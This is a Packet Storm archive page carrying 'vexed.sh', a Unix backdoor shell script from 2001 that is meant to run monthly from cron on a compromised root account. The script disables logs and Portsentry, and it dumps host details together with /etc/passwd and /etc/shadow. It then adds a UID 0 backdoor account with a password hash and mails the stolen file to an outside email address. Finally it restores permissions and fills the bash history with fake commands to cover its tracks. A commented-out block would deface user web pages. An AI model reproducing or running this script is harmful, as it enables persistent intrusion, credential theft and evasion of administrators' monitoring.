exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

vexed.sh

vexed.sh
Posted Nov 22, 2001
Authored by Sil

Backdoor shell script to be run from cron monthly.

tags | tool, shell, rootkit
systems | unix
SHA-256 | 4a51bcecc880b78e5845e0c1ac80f9ec82f41bd9dad31c57256aed344a399b3c

vexed.sh

Change Mirror Download
#######################
# !/bin/sh
# vexed
# sil@antioffline.com
# Ultimate Backdoor
# Keeper set to run
# in cron.monthly
# Dumb script, but
# served its purpose
# for me.
#######################

PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

# Lets stop logging commands for a bit
# remember this is after you have root.

chmod 0 /root/.bash_history

# stop log files in case of Portsentry
# Logcheck, NFR, etc

chmod 0 /var/log/*

# Of course they'll be set shit back to
# normal after this script runs itself.

# Lets stop portsentry from adding our
# asses to the deny file

chmod 0 /usr/local/psionic/portsentry/*

# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
# Default path for portsentry

# Create our file for future root reference
# set it so no one else can touch it while
# it runs... Of course root can though...

touch /tmp/vexed
chmod 0 /tmp/vexed

# Get a hosts info for reference

ifconfig -a >> /tmp/vexed

# Paranoia! Lets see what was running to get
# a hint of anything we'd have to kill in an
# emergency.

ps aux >> /tmp/vexed

# Wanna waste time cracking a password
# file ... whatever floats your boat.
# I just cat a user into the shadow
# file. Remember to tweak this if there's
# no shadow file. # out shadow and enter
# the password into the >> passwd file

# Easy way to determine the correct setting
# would be to adduser in your OS and copy it
# then echo it to the correct destination.
# EG: /etc/master.passwd for BSD's
# I set this UID=0 since there are over 1000
# users on this specific server and I know
# the admin doesn't monitor the box
# you should change this to 500 most likely.

cat /etc/passwd >> /tmp/vexed
cat /etc/shadow >> /tmp/vexed

# BSD users
# cat /etc/master.passwd >> /tmp/vexed

echo alterb0y:shWm5UR68F3Us:0:0::/:/bin/bash >> /etc/shadow
echo alterb0y:x:0:0::/:/bin/bash >> /etc/shadow

# Next bunch of crap is basically bullshit
# but some kiddies might find it useful.
# It's commented out since I have no use
# for it whatsoever.
# For milw0rm type page hax0rers
# easiest way to do it would be
# to get a userlist and uncomment
# this junk to change their webpages.
# greets to xinu for the switch ;)
#
# find / -name index* >> /tmp/vexed
#
# for user in `cat userlist`
#
# do
#
# mv $user/index.html $user/orig.index.html
#
# cp /your/leet0/html/pages/path $user/index.html
#
# done

# Obviously an email foreign to anyone. I set this
# account up purposely for dumb shit.

mail -s ro0ted realitykillz@hotmail.com < /tmp/vexed
rm -f /tmp/vexed
chmod 744 /var/log/*
chmod 744 /usr/local/psionic/portsentry/*

# Throw in a bunch of crap to fill _bash_history ;)

echo ls -a >> ~/.bash_history
echo uptime >> ~/.bash_history
echo du . -m >> ~/.bash_history
echo w >> ~/.bash_history
echo dig someshit.org >> ~/.bash_history
echo man time >> ~/.bash_history
echo man hostname >> ~/.bash_history
echo ls -a >> ~/.bash_history
repeat 10 echo ls -a >> ~/.bash_history

#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#
# Served its purpose for me at least
# #bofh #syndrome #unixgods on the efnet
#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close